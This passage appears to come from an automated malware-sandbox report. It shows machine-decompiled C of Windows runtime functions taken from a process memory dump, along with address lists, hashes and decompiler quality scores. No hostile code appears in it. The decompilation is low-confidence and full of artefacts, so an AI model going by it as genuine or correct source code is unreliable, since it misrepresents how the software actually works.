						asm("int3");
						asm("int3");
						_push(0xaa7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E009C6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E009C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00A58938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E009BB150();
													}
													_t116 = E00A56D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E009C75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xaa8638; // 0x0
																	_t122 = L009C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E009C76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E009C76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L009EFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L009C70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E009EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E009EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E009EFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E009EFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E009EFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xaa7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xaa7b84 = _t75;
						_t73 = E009CEB70(_t134, 0xaa7b60);
						if( *0xaa7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L009CFF60( *0xaa7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                    0x009efab0
                                                                                    0x009efab2
                                                                                    0x009efab3
                                                                                    0x009efab4
                                                                                    0x009efabc
                                                                                    0x009efac0
                                                                                    0x009efb14
                                                                                    0x009efb17
                                                                                    0x009efac2
                                                                                    0x009efac8
                                                                                    0x009efacd
                                                                                    0x009efad3
                                                                                    0x009efad3
                                                                                    0x009efadd
                                                                                    0x009efb18
                                                                                    0x009efb1b
                                                                                    0x009efb1d
                                                                                    0x009efb1e
                                                                                    0x009efb1f
                                                                                    0x009efb20
                                                                                    0x009efb21
                                                                                    0x009efb22
                                                                                    0x009efb23
                                                                                    0x009efb24
                                                                                    0x009efb25
                                                                                    0x009efb26
                                                                                    0x009efb27
                                                                                    0x009efb28
                                                                                    0x009efb29
                                                                                    0x009efb2a
                                                                                    0x009efb2b
                                                                                    0x009efb2c
                                                                                    0x009efb2d
                                                                                    0x009efb2e
                                                                                    0x009efb2f
                                                                                    0x009efb3a
                                                                                    0x009efb3b
                                                                                    0x009efb3e
                                                                                    0x009efb41
                                                                                    0x009efb44
                                                                                    0x009efb47
                                                                                    0x009efb4a
                                                                                    0x009efb4d
                                                                                    0x009efb53
                                                                                    0x00a2bdcb
                                                                                    0x00a2bdcb
                                                                                    0x009efb59
                                                                                    0x009efb5b
                                                                                    0x009efb5b
                                                                                    0x009efb5e
                                                                                    0x00a2bdd5
                                                                                    0x00a2bdd8
                                                                                    0x00000000
                                                                                    0x00a2bdda
                                                                                    0x00000000
                                                                                    0x00a2bdda
                                                                                    0x009efb64
                                                                                    0x009efb64
                                                                                    0x009efb64
                                                                                    0x009efb67
                                                                                    0x009efb6e
                                                                                    0x009efb70
                                                                                    0x009efb72
                                                                                    0x00000000
                                                                                    0x009efb78
                                                                                    0x009efb7a
                                                                                    0x009efb7a
                                                                                    0x009efb7d
                                                                                    0x009efb80
                                                                                    0x00a2bddf
                                                                                    0x00a2bde1
                                                                                    0x00000000
                                                                                    0x00a2bde3
                                                                                    0x00000000
                                                                                    0x00a2bde3
                                                                                    0x009efb86
                                                                                    0x009efb86
                                                                                    0x009efb86
                                                                                    0x009efb8b
                                                                                    0x009efb90
                                                                                    0x009efb92
                                                                                    0x009efb94
                                                                                    0x009efb9a
                                                                                    0x009efb9b
                                                                                    0x009efba1
                                                                                    0x00a2bde8
                                                                                    0x00a2bdeb
                                                                                    0x00a2bded
                                                                                    0x00a2beb5
                                                                                    0x00a2beb5
                                                                                    0x00a2bebb
                                                                                    0x00a2bebd
                                                                                    0x00a2bec3
                                                                                    0x00a2bed2
                                                                                    0x00a2bedd
                                                                                    0x00a2bedd
                                                                                    0x00a2beed
                                                                                    0x00000000
                                                                                    0x00a2bdf3
                                                                                    0x00a2bdfe
                                                                                    0x00a2be06
                                                                                    0x00a2be0b
                                                                                    0x00a2be0d
                                                                                    0x00a2be0f
                                                                                    0x00a2be14
                                                                                    0x00a2be19
                                                                                    0x00a2be20
                                                                                    0x00a2be25
                                                                                    0x00a2be27
                                                                                    0x00a2be35
                                                                                    0x00a2be39
                                                                                    0x00a2be46
                                                                                    0x00a2be4f
                                                                                    0x00a2be54
                                                                                    0x00a2be56
                                                                                    0x00a2bef8
                                                                                    0x00a2bef8
                                                                                    0x00000000
                                                                                    0x00a2be5c
                                                                                    0x00a2be5c
                                                                                    0x00a2be60
                                                                                    0x00000000
                                                                                    0x00a2be66
                                                                                    0x00a2be66
                                                                                    0x00a2be7f
                                                                                    0x00a2be84
                                                                                    0x00a2be87
                                                                                    0x00a2be89
                                                                                    0x00a2be8b
                                                                                    0x00a2be99
                                                                                    0x00a2be9d
                                                                                    0x00a2bea0
                                                                                    0x00a2beac
                                                                                    0x00a2beaf
                                                                                    0x00a2beb1
                                                                                    0x00a2beb3
                                                                                    0x00a2beb3
                                                                                    0x00000000
                                                                                    0x00a2bea2
                                                                                    0x00a2bea2
                                                                                    0x00000000
                                                                                    0x00a2bea2
                                                                                    0x00a2be8d
                                                                                    0x00a2be8d
                                                                                    0x00a2be92
                                                                                    0x00000000
                                                                                    0x00a2be92
                                                                                    0x00a2be8b
                                                                                    0x00a2be60
                                                                                    0x00a2be3b
                                                                                    0x00a2be3b
                                                                                    0x00a2be3e
                                                                                    0x00000000
                                                                                    0x00a2be40
                                                                                    0x00a2be40
                                                                                    0x00a2be44
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a2be44
                                                                                    0x00a2be3e
                                                                                    0x00a2be29
                                                                                    0x00a2be29
                                                                                    0x00000000
                                                                                    0x00a2be29
                                                                                    0x00a2be27
                                                                                    0x00000000
                                                                                    0x009efba7
                                                                                    0x009efba7
                                                                                    0x009efbab
                                                                                    0x00a2bf02
                                                                                    0x009efbb1
                                                                                    0x009efbb1
                                                                                    0x009efbb8
                                                                                    0x009efbbd
                                                                                    0x009efbbd
                                                                                    0x009efbbf
                                                                                    0x009efbbf
                                                                                    0x009efbc5
                                                                                    0x009efbcb
                                                                                    0x009efbf8
                                                                                    0x009efbf8
                                                                                    0x009efbfa
                                                                                    0x00000000
                                                                                    0x009efc00
                                                                                    0x009efc00
                                                                                    0x009efc03
                                                                                    0x00000000
                                                                                    0x009efc09
                                                                                    0x009efc09
                                                                                    0x009efc0f
                                                                                    0x009efc15
                                                                                    0x009efc23
                                                                                    0x009efc23
                                                                                    0x009efc25
                                                                                    0x009efc27
                                                                                    0x009efc75
                                                                                    0x009efc7c
                                                                                    0x009efc84
                                                                                    0x00000000
                                                                                    0x009efc29
                                                                                    0x009efc29
                                                                                    0x009efc2d
                                                                                    0x009efc30
                                                                                    0x00a2bf0f
                                                                                    0x00000000
                                                                                    0x009efc36
                                                                                    0x009efc38
                                                                                    0x009efc3b
                                                                                    0x009efc41
                                                                                    0x00a2bf17
                                                                                    0x00a2bf19
                                                                                    0x00a2bf48
                                                                                    0x00a2bf4b
                                                                                    0x00000000
                                                                                    0x00a2bf1b
                                                                                    0x00a2bf22
                                                                                    0x00a2bf24
                                                                                    0x00a2bf26
                                                                                    0x00000000
                                                                                    0x00a2bf2c
                                                                                    0x00a2bf37
                                                                                    0x00a2bf39
                                                                                    0x00a2bf3b
                                                                                    0x00000000
                                                                                    0x00a2bf41
                                                                                    0x00a2bf41
                                                                                    0x00a2bf41
                                                                                    0x00a2bf41
                                                                                    0x00a2bf45
                                                                                    0x00000000
                                                                                    0x00a2bf45
                                                                                    0x00a2bf3b
                                                                                    0x00a2bf26
                                                                                    0x00000000
                                                                                    0x009efc47
                                                                                    0x009efc47
                                                                                    0x009efc49
                                                                                    0x009efcb2
                                                                                    0x009efcb4
                                                                                    0x009efcb6
                                                                                    0x009efcdc
                                                                                    0x009efcdc
                                                                                    0x00000000
                                                                                    0x009efcb8
                                                                                    0x009efcc3
                                                                                    0x009efcc5
                                                                                    0x009efcc7
                                                                                    0x00000000
                                                                                    0x009efcc9
                                                                                    0x009efcc9
                                                                                    0x009efccd
                                                                                    0x00000000
                                                                                    0x009efccd
                                                                                    0x009efcc7
                                                                                    0x00000000
                                                                                    0x009efc4b
                                                                                    0x009efc4b
                                                                                    0x009efc4e
                                                                                    0x009efc4e
                                                                                    0x009efc51
                                                                                    0x009efc51
                                                                                    0x009efc54
                                                                                    0x009efc5a
                                                                                    0x009efc5c
                                                                                    0x009efc5f
                                                                                    0x009efc61
                                                                                    0x009efc63
                                                                                    0x009efc65
                                                                                    0x009efc67
                                                                                    0x009efc6e
                                                                                    0x009efc72
                                                                                    0x009efc72
                                                                                    0x009efc72
                                                                                    0x009efc72
                                                                                    0x009efc67
                                                                                    0x009efc61
                                                                                    0x00000000
                                                                                    0x009efc5a
                                                                                    0x009efc49
                                                                                    0x009efc41
                                                                                    0x009efc30
                                                                                    0x009efc27
                                                                                    0x009efc03
                                                                                    0x009efbcd
                                                                                    0x009efbd3
                                                                                    0x009efbd9
                                                                                    0x009efbdc
                                                                                    0x009efbde
                                                                                    0x009efc99
                                                                                    0x009efc9b
                                                                                    0x009efc9d
                                                                                    0x009efcd5
                                                                                    0x009efcd5
                                                                                    0x009efc89
                                                                                    0x009efc89
                                                                                    0x00000000
                                                                                    0x009efc9f
                                                                                    0x009efc9f
                                                                                    0x009efca3
                                                                                    0x00000000
                                                                                    0x009efca3
                                                                                    0x00000000
                                                                                    0x009efbe4
                                                                                    0x009efbe4
                                                                                    0x009efbe4
                                                                                    0x009efbe4
                                                                                    0x009efbe9
                                                                                    0x009efbf2
                                                                                    0x00000000
                                                                                    0x009efbf2
                                                                                    0x009efbde
                                                                                    0x009efbcb
                                                                                    0x009efbab
                                                                                    0x009efc8b
                                                                                    0x009efc8b
                                                                                    0x009efc8c
                                                                                    0x009efb80
                                                                                    0x009efb72
                                                                                    0x009efb5e
                                                                                    0x009efc8d
                                                                                    0x009efc91
                                                                                    0x009efadf
                                                                                    0x009efadf
                                                                                    0x009efae1
                                                                                    0x009efae4
                                                                                    0x009efae7
                                                                                    0x009efaec
                                                                                    0x009efaf8
                                                                                    0x009efb00
                                                                                    0x009efb07
                                                                                    0x009efb0f
                                                                                    0x009efb0f
                                                                                    0x009efb07
                                                                                    0x00000000
                                                                                    0x009efaf8
                                                                                    0x009efadd

                                                                                    Strings
                                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00A2BE0F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                    • API String ID: 0-865735534
                                                                                    • Opcode ID: 9a09c02aefc936918dfe3a14a8f517493d636ad41aaa0513ac0f450c17604831
                                                                                    • Instruction ID: 70d0c2dbadef7af2f242d325f34321256c389597b3af31358020e63a38335a8e
                                                                                    • Opcode Fuzzy Hash: 9a09c02aefc936918dfe3a14a8f517493d636ad41aaa0513ac0f450c17604831
                                                                                    • Instruction Fuzzy Hash: 4EA12A71B00695DBDB26CF69C860BBAB3A5AF44710F24457EE846CB691DB34DC41CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009B2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 63%
                                                                                    			E009B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xaa5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xaa7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E009F97C0();
				}
				if( *0xaa79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xaa79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E009E1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E009D7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00A4FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E009F9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E009EE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00A0DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xaa6901;
								_push(_t109);
								_v52 = _t98;
								if( *0xaa6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E009F9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E009F95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E009D7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E009D7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00A37016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00A4FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xaa5350;
							if(_t109 != 0xaa5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00A4FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						L00A45720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                    0x009b2d8a
                                                                                    0x009b2d8a
                                                                                    0x009b2d92
                                                                                    0x009b2d96
                                                                                    0x009b2d9e
                                                                                    0x009b2da0
                                                                                    0x009b2da3
                                                                                    0x009b2da5
                                                                                    0x009b2da8
                                                                                    0x009b2dab
                                                                                    0x009b2db2
                                                                                    0x00a0f9aa
                                                                                    0x00a0f9ab
                                                                                    0x00a0f9ae
                                                                                    0x00a0f9ae
                                                                                    0x009b2db8
                                                                                    0x009b2dc2
                                                                                    0x00a0f9b9
                                                                                    0x00a0f9be
                                                                                    0x00a0f9bf
                                                                                    0x00a0f9bf
                                                                                    0x009b2dcf
                                                                                    0x00a0f9c9
                                                                                    0x009b2dd5
                                                                                    0x009b2dd5
                                                                                    0x009b2dd5
                                                                                    0x009b2dde
                                                                                    0x009b2de1
                                                                                    0x009b2e70
                                                                                    0x009b2e72
                                                                                    0x009b2e72
                                                                                    0x009b2de7
                                                                                    0x009b2deb
                                                                                    0x009b2e7c
                                                                                    0x009b2e83
                                                                                    0x009b2e85
                                                                                    0x009b2e8b
                                                                                    0x009b2e8d
                                                                                    0x009b2e92
                                                                                    0x009b2e92
                                                                                    0x009b2e85
                                                                                    0x009b2df1
                                                                                    0x009b2df7
                                                                                    0x009b2df9
                                                                                    0x009b2df9
                                                                                    0x009b2dfc
                                                                                    0x009b2dff
                                                                                    0x009b2e02
                                                                                    0x00000000
                                                                                    0x009b2e05
                                                                                    0x009b2e0c
                                                                                    0x00a0f9d9
                                                                                    0x009b2e12
                                                                                    0x009b2e12
                                                                                    0x009b2e12
                                                                                    0x009b2e1a
                                                                                    0x00a0f9e3
                                                                                    0x00a0f9e9
                                                                                    0x00a0f9f0
                                                                                    0x00a0f9f6
                                                                                    0x00a0f9f8
                                                                                    0x00a0f9f8
                                                                                    0x00a0f9f0
                                                                                    0x009b2e23
                                                                                    0x00a0fa02
                                                                                    0x00a0fa03
                                                                                    0x00a0fa05
                                                                                    0x00a0fa06
                                                                                    0x00000000
                                                                                    0x009b2e29
                                                                                    0x009b2e29
                                                                                    0x009b2e2e
                                                                                    0x009b2e34
                                                                                    0x009b2e3e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009b2e44
                                                                                    0x009b2e47
                                                                                    0x009b2e4d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009b2e4f
                                                                                    0x009b2e54
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009b2e5a
                                                                                    0x009b2e5f
                                                                                    0x009b2e9a
                                                                                    0x009b2ea4
                                                                                    0x009b2ea5
                                                                                    0x009b2ea8
                                                                                    0x009b2eaf
                                                                                    0x009b2eb2
                                                                                    0x009b2eb5
                                                                                    0x00a0fae9
                                                                                    0x00a0faeb
                                                                                    0x00a0faed
                                                                                    0x00a0faef
                                                                                    0x00a0faf7
                                                                                    0x00a0faf8
                                                                                    0x00a0fafd
                                                                                    0x00a0faff
                                                                                    0x00a0fb04
                                                                                    0x00a0fb04
                                                                                    0x00a0faff
                                                                                    0x009b2ec0
                                                                                    0x009b2ec4
                                                                                    0x009b2ec6
                                                                                    0x009b2ec8
                                                                                    0x00a0fb14
                                                                                    0x00a0fb18
                                                                                    0x00a0fb1e
                                                                                    0x00a0fb21
                                                                                    0x00a0fb21
                                                                                    0x009b2ece
                                                                                    0x009b2ece
                                                                                    0x009b2ece
                                                                                    0x009b2ed7
                                                                                    0x009b2e61
                                                                                    0x009b2e63
                                                                                    0x00a0fa6b
                                                                                    0x00a0fa71
                                                                                    0x00a0fa76
                                                                                    0x00a0fa78
                                                                                    0x00a0fa8a
                                                                                    0x00a0fa7a
                                                                                    0x00a0fa83
                                                                                    0x00a0fa83
                                                                                    0x00a0fa8f
                                                                                    0x00a0fa91
                                                                                    0x00a0fa97
                                                                                    0x00a0fa9d
                                                                                    0x00a0faa4
                                                                                    0x00a0faaa
                                                                                    0x00a0faaf
                                                                                    0x00a0fab1
                                                                                    0x00a0fac3
                                                                                    0x00a0fab3
                                                                                    0x00a0fabc
                                                                                    0x00a0fabc
                                                                                    0x00a0fac8
                                                                                    0x00a0facb
                                                                                    0x00a0fadf
                                                                                    0x00a0fadf
                                                                                    0x00a0facb
                                                                                    0x00a0faa4
                                                                                    0x00a0fa91
                                                                                    0x009b2e6f
                                                                                    0x009b2e6f
                                                                                    0x009b2e5f
                                                                                    0x00a0fa13
                                                                                    0x00a0fa15
                                                                                    0x00a0fa17
                                                                                    0x00a0fa1f
                                                                                    0x00a0fa21
                                                                                    0x00a0fa22
                                                                                    0x00a0fa25
                                                                                    0x00a0fa28
                                                                                    0x00a0fa2f
                                                                                    0x00a0fa2f
                                                                                    0x00a0fa2a
                                                                                    0x00a0fa2a
                                                                                    0x00a0fa2a
                                                                                    0x00a0fa31
                                                                                    0x00a0fa34
                                                                                    0x00a0fa36
                                                                                    0x00a0fa3c
                                                                                    0x00a0fa3e
                                                                                    0x00a0fa41
                                                                                    0x00a0fa43
                                                                                    0x00a0fa45
                                                                                    0x00a0fa45
                                                                                    0x00a0fa41
                                                                                    0x00a0fa3c
                                                                                    0x00a0fa4a
                                                                                    0x00a0fa4f
                                                                                    0x00a0fa51
                                                                                    0x00a0fa53
                                                                                    0x00a0fa56
                                                                                    0x00a0fa5b
                                                                                    0x00a0fa5e
                                                                                    0x00000000
                                                                                    0x00a0fa5e
                                                                                    0x009b2e23

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Re-Waiting
                                                                                    • API String ID: 0-316354757
                                                                                    • Opcode ID: e7724590f6436fa0c16125be918db9575f62afed71ac2247f0b78f8035d864bb
                                                                                    • Instruction ID: d3a5728ed711545f8b4db3084fc09d4ec2b0095381027ee049fab7ed3ea8cf72
                                                                                    • Opcode Fuzzy Hash: e7724590f6436fa0c16125be918db9575f62afed71ac2247f0b78f8035d864bb
                                                                                    • Instruction Fuzzy Hash: 85614530B00608AFDB32DF68D944BBEB7A5EB85760F24067AE815A76D1C738ED01C791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009B52A5, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E009B52A5(char __ecx) {
